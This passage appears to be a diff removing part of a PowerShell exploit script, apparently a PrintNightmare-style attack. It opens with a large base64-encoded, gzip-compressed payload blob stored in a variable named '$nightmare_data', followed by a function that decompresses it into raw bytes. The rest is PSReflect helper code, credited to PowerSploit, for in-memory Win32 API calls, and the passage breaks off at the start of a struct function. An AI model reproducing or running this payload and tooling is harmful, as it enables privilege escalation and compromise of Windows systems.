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")
-
-    $nightmare_ms = New-Object System.IO.MemoryStream -ArgumentList @(,$nightmare_data)
-    $ms = New-Object System.IO.MemoryStream
-    $gzs = New-Object System.IO.Compression.GZipStream -ArgumentList @($nightmare_ms, [System.IO.Compression.CompressionMode]::Decompress)
-    $gzs.CopyTo($ms)
-    $gzs.Close()
-    $nightmare_ms.Close()
-
-    return $ms.ToArray()
-}
-
-########################################################
-# Stolen from PowerSploit: https://github.com/PowerShellMafia/PowerSploit
-########################################################
-
-########################################################
-#
-# PSReflect code for Windows API access
-# Author: @mattifestation
-#   https://raw.githubusercontent.com/mattifestation/PSReflect/master/PSReflect.psm1
-#
-########################################################
-
-function New-InMemoryModule {
-<#
-.SYNOPSIS
-Creates an in-memory assembly and module
-Author: Matthew Graeber (@mattifestation)
-License: BSD 3-Clause
-Required Dependencies: None
-Optional Dependencies: None
-.DESCRIPTION
-When defining custom enums, structs, and unmanaged functions, it is
-necessary to associate to an assembly module. This helper function
-creates an in-memory module that can be passed to the 'enum',
-'struct', and Add-Win32Type functions.
-.PARAMETER ModuleName
-Specifies the desired name for the in-memory assembly and module. If
-ModuleName is not provided, it will default to a GUID.
-.EXAMPLE
-$Module = New-InMemoryModule -ModuleName Win32
-#>
-
-    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')]
-    [CmdletBinding()]
-    Param (
-        [Parameter(Position = 0)]
-        [ValidateNotNullOrEmpty()]
-        [String]
-        $ModuleName = [Guid]::NewGuid().ToString()
-    )
-
-    $AppDomain = [Reflection.Assembly].Assembly.GetType('System.AppDomain').GetProperty('CurrentDomain').GetValue($null, @())
-    $LoadedAssemblies = $AppDomain.GetAssemblies()
-
-    foreach ($Assembly in $LoadedAssemblies) {
-        if ($Assembly.FullName -and ($Assembly.FullName.Split(',')[0] -eq $ModuleName)) {
-            return $Assembly
-        }
-    }
-
-    $DynAssembly = New-Object Reflection.AssemblyName($ModuleName)
-    $Domain = $AppDomain
-    $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, 'Run')
-    $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule($ModuleName, $False)
-
-    return $ModuleBuilder
-}
-
-# A helper function used to reduce typing while defining function
-# prototypes for Add-Win32Type.
-function func {
-    Param (
-        [Parameter(Position = 0, Mandatory = $True)]
-        [String]
-        $DllName,
-
-        [Parameter(Position = 1, Mandatory = $True)]
-        [string]
-        $FunctionName,
-
-        [Parameter(Position = 2, Mandatory = $True)]
-        [Type]
-        $ReturnType,
-
-        [Parameter(Position = 3)]
-        [Type[]]
-        $ParameterTypes,
-
-        [Parameter(Position = 4)]
-        [Runtime.InteropServices.CallingConvention]
-        $NativeCallingConvention,
-
-        [Parameter(Position = 5)]
-        [Runtime.InteropServices.CharSet]
-        $Charset,
-
-        [String]
-        $EntryPoint,
-
-        [Switch]
-        $SetLastError
-    )
-
-    $Properties = @{
-        DllName = $DllName
-        FunctionName = $FunctionName
-        ReturnType = $ReturnType
-    }
-
-    if ($ParameterTypes) { $Properties['ParameterTypes'] = $ParameterTypes }
-    if ($NativeCallingConvention) { $Properties['NativeCallingConvention'] = $NativeCallingConvention }
-    if ($Charset) { $Properties['Charset'] = $Charset }
-    if ($SetLastError) { $Properties['SetLastError'] = $SetLastError }
-    if ($EntryPoint) { $Properties['EntryPoint'] = $EntryPoint }
-
-    New-Object PSObject -Property $Properties
-}
-
-function Add-Win32Type
-{
-<#
-.SYNOPSIS
-Creates a .NET type for an unmanaged Win32 function.
-Author: Matthew Graeber (@mattifestation)
-License: BSD 3-Clause
-Required Dependencies: None
-Optional Dependencies: func
-.DESCRIPTION
-Add-Win32Type enables you to easily interact with unmanaged (i.e.
-Win32 unmanaged) functions in PowerShell. After providing
-Add-Win32Type with a function signature, a .NET type is created
-using reflection (i.e. csc.exe is never called like with Add-Type).
-The 'func' helper function can be used to reduce typing when defining
-multiple function definitions.
-.PARAMETER DllName
-The name of the DLL.
-.PARAMETER FunctionName
-The name of the target function.
-.PARAMETER EntryPoint
-The DLL export function name. This argument should be specified if the
-specified function name is different than the name of the exported
-function.
-.PARAMETER ReturnType
-The return type of the function.
-.PARAMETER ParameterTypes
-The function parameters.
-.PARAMETER NativeCallingConvention
-Specifies the native calling convention of the function. Defaults to
-stdcall.
-.PARAMETER Charset
-If you need to explicitly call an 'A' or 'W' Win32 function, you can
-specify the character set.
-.PARAMETER SetLastError
-Indicates whether the callee calls the SetLastError Win32 API
-function before returning from the attributed method.
-.PARAMETER Module
-The in-memory module that will host the functions. Use
-New-InMemoryModule to define an in-memory module.
-.PARAMETER Namespace
-An optional namespace to prepend to the type. Add-Win32Type defaults
-to a namespace consisting only of the name of the DLL.
-.EXAMPLE
-$Mod = New-InMemoryModule -ModuleName Win32
-$FunctionDefinitions = @(
-  (func kernel32 GetProcAddress ([IntPtr]) @([IntPtr], [String]) -Charset Ansi -SetLastError),
-  (func kernel32 GetModuleHandle ([Intptr]) @([String]) -SetLastError),
-  (func ntdll RtlGetCurrentPeb ([IntPtr]) @())
-)
-$Types = $FunctionDefinitions | Add-Win32Type -Module $Mod -Namespace 'Win32'
-$Kernel32 = $Types['kernel32']
-$Ntdll = $Types['ntdll']
-$Ntdll::RtlGetCurrentPeb()
-$ntdllbase = $Kernel32::GetModuleHandle('ntdll')
-$Kernel32::GetProcAddress($ntdllbase, 'RtlGetCurrentPeb')
-.NOTES
-Inspired by Lee Holmes' Invoke-WindowsApi http://poshcode.org/2189
-When defining multiple function prototypes, it is ideal to provide
-Add-Win32Type with an array of function signatures. That way, they
-are all incorporated into the same in-memory module.
-#>
-
-    [OutputType([Hashtable])]
-    Param(
-        [Parameter(Mandatory=$True, ValueFromPipelineByPropertyName=$True)]
-        [String]
-        $DllName,
-
-        [Parameter(Mandatory=$True, ValueFromPipelineByPropertyName=$True)]
-        [String]
-        $FunctionName,
-
-        [Parameter(ValueFromPipelineByPropertyName=$True)]
-        [String]
-        $EntryPoint,
-
-        [Parameter(Mandatory=$True, ValueFromPipelineByPropertyName=$True)]
-        [Type]
-        $ReturnType,
-
-        [Parameter(ValueFromPipelineByPropertyName=$True)]
-        [Type[]]
-        $ParameterTypes,
-
-        [Parameter(ValueFromPipelineByPropertyName=$True)]
-        [Runtime.InteropServices.CallingConvention]
-        $NativeCallingConvention = [Runtime.InteropServices.CallingConvention]::StdCall,
-
-        [Parameter(ValueFromPipelineByPropertyName=$True)]
-        [Runtime.InteropServices.CharSet]
-        $Charset = [Runtime.InteropServices.CharSet]::Auto,
-
-        [Parameter(ValueFromPipelineByPropertyName=$True)]
-        [Switch]
-        $SetLastError,
-
-        [Parameter(Mandatory=$True)]
-        [ValidateScript({($_ -is [Reflection.Emit.ModuleBuilder]) -or ($_ -is [Reflection.Assembly])})]
-        $Module,
-
-        [ValidateNotNull()]
-        [String]
-        $Namespace = ''
-    )
-
-    BEGIN
-    {
-        $TypeHash = @{}
-    }
-
-    PROCESS
-    {
-        if ($Module -is [Reflection.Assembly])
-        {
-            if ($Namespace)
-            {
-                $TypeHash[$DllName] = $Module.GetType("$Namespace.$DllName")
-            }
-            else
-            {
-                $TypeHash[$DllName] = $Module.GetType($DllName)
-            }
-        }
-        else
-        {
-            # Define one type for each DLL
-            if (!$TypeHash.ContainsKey($DllName))
-            {
-                if ($Namespace)
-                {
-                    $TypeHash[$DllName] = $Module.DefineType("$Namespace.$DllName", 'Public,BeforeFieldInit')
-                }
-                else
-                {
-                    $TypeHash[$DllName] = $Module.DefineType($DllName, 'Public,BeforeFieldInit')
-                }
-            }
-
-            $Method = $TypeHash[$DllName].DefineMethod(
-                $FunctionName,
-                'Public,Static,PinvokeImpl',
-                $ReturnType,
-                $ParameterTypes)
-
-            # Make each ByRef parameter an Out parameter
-            $i = 1
-            foreach($Parameter in $ParameterTypes)
-            {
-                if ($Parameter.IsByRef)
-                {
-                    [void] $Method.DefineParameter($i, 'Out', $null)
-                }
-
-                $i++
-            }
-
-            $DllImport = [Runtime.InteropServices.DllImportAttribute]
-            $SetLastErrorField = $DllImport.GetField('SetLastError')
-            $CallingConventionField = $DllImport.GetField('CallingConvention')
-            $CharsetField = $DllImport.GetField('CharSet')
-            $EntryPointField = $DllImport.GetField('EntryPoint')
-            if ($SetLastError) { $SLEValue = $True } else { $SLEValue = $False }
-
-            if ($PSBoundParameters['EntryPoint']) { $ExportedFuncName = $EntryPoint } else { $ExportedFuncName = $FunctionName }
-
-            # Equivalent to C# version of [DllImport(DllName)]
-            $Constructor = [Runtime.InteropServices.DllImportAttribute].GetConstructor([String])
-            $DllImportAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($Constructor,
-                $DllName, [Reflection.PropertyInfo[]] @(), [Object[]] @(),
-                [Reflection.FieldInfo[]] @($SetLastErrorField,
-                                           $CallingConventionField,
-                                           $CharsetField,
-                                           $EntryPointField),
-                [Object[]] @($SLEValue,
-                             ([Runtime.InteropServices.CallingConvention] $NativeCallingConvention),
-                             ([Runtime.InteropServices.CharSet] $Charset),
-                             $ExportedFuncName))
-
-            $Method.SetCustomAttribute($DllImportAttribute)
-        }
-    }
-
-    END
-    {
-        if ($Module -is [Reflection.Assembly])
-        {
-            return $TypeHash
-        }
-
-        $ReturnTypes = @{}
-
-        foreach ($Key in $TypeHash.Keys)
-        {
-            $Type = $TypeHash[$Key].CreateType()
-
-            $ReturnTypes[$Key] = $Type
-        }
-
-        return $ReturnTypes
-    }
-}
-
-
-function psenum {
-<#
-.SYNOPSIS
-Creates an in-memory enumeration for use in your PowerShell session.
-Author: Matthew Graeber (@mattifestation)
-License: BSD 3-Clause
-Required Dependencies: None
-Optional Dependencies: None
-.DESCRIPTION
-The 'psenum' function facilitates the creation of enums entirely in
-memory using as close to a "C style" as PowerShell will allow.
-.PARAMETER Module
-The in-memory module that will host the enum. Use
-New-InMemoryModule to define an in-memory module.
-.PARAMETER FullName
-The fully-qualified name of the enum.
-.PARAMETER Type
-The type of each enum element.
-.PARAMETER EnumElements
-A hashtable of enum elements.
-.PARAMETER Bitfield
-Specifies that the enum should be treated as a bitfield.
-.EXAMPLE
-$Mod = New-InMemoryModule -ModuleName Win32
-$ImageSubsystem = psenum $Mod PE.IMAGE_SUBSYSTEM UInt16 @{
-    UNKNOWN =                  0
-    NATIVE =                   1 # Image doesn't require a subsystem.
-    WINDOWS_GUI =              2 # Image runs in the Windows GUI subsystem.
-    WINDOWS_CUI =              3 # Image runs in the Windows character subsystem.
-    OS2_CUI =                  5 # Image runs in the OS/2 character subsystem.
-    POSIX_CUI =                7 # Image runs in the Posix character subsystem.
-    NATIVE_WINDOWS =           8 # Image is a native Win9x driver.
-    WINDOWS_CE_GUI =           9 # Image runs in the Windows CE subsystem.
-    EFI_APPLICATION =          10
-    EFI_BOOT_SERVICE_DRIVER =  11
-    EFI_RUNTIME_DRIVER =       12
-    EFI_ROM =                  13
-    XBOX =                     14
-    WINDOWS_BOOT_APPLICATION = 16
-}
-.NOTES
-PowerShell purists may disagree with the naming of this function but
-again, this was developed in such a way so as to emulate a "C style"
-definition as closely as possible. Sorry, I'm not going to name it
-New-Enum. :P
-#>
-
-    [OutputType([Type])]
-    Param (
-        [Parameter(Position = 0, Mandatory=$True)]
-        [ValidateScript({($_ -is [Reflection.Emit.ModuleBuilder]) -or ($_ -is [Reflection.Assembly])})]
-        $Module,
-
-        [Parameter(Position = 1, Mandatory=$True)]
-        [ValidateNotNullOrEmpty()]
-        [String]
-        $FullName,
-
-        [Parameter(Position = 2, Mandatory=$True)]
-        [Type]
-        $Type,
-
-        [Parameter(Position = 3, Mandatory=$True)]
-        [ValidateNotNullOrEmpty()]
-        [Hashtable]
-        $EnumElements,
-
-        [Switch]
-        $Bitfield
-    )
-
-    if ($Module -is [Reflection.Assembly])
-    {
-        return ($Module.GetType($FullName))
-    }
-
-    $EnumType = $Type -as [Type]
-
-    $EnumBuilder = $Module.DefineEnum($FullName, 'Public', $EnumType)
-
-    if ($Bitfield)
-    {
-        $FlagsConstructor = [FlagsAttribute].GetConstructor(@())
-        $FlagsCustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($FlagsConstructor, @())
-        $EnumBuilder.SetCustomAttribute($FlagsCustomAttribute)
-    }
-
-    foreach ($Key in $EnumElements.Keys)
-    {
-        # Apply the specified enum type to each element
-        $null = $EnumBuilder.DefineLiteral($Key, $EnumElements[$Key] -as $EnumType)
-    }
-
-    $EnumBuilder.CreateType()
-}
-
-
-# A helper function used to reduce typing while defining struct
-# fields.
-function field {
-    Param (
-        [Parameter(Position = 0, Mandatory=$True)]
-        [UInt16]
-        $Position,
-
-        [Parameter(Position = 1, Mandatory=$True)]
-        [Type]
-        $Type,
-
-        [Parameter(Position = 2)]
-        [UInt16]
-        $Offset,
-
-        [Object[]]
-        $MarshalAs
-    )
-
-    @{
-        Position = $Position
-        Type = $Type -as [Type]
-        Offset = $Offset
-        MarshalAs = $MarshalAs
-    }
-}
-
-
-function struct
-{
-<#
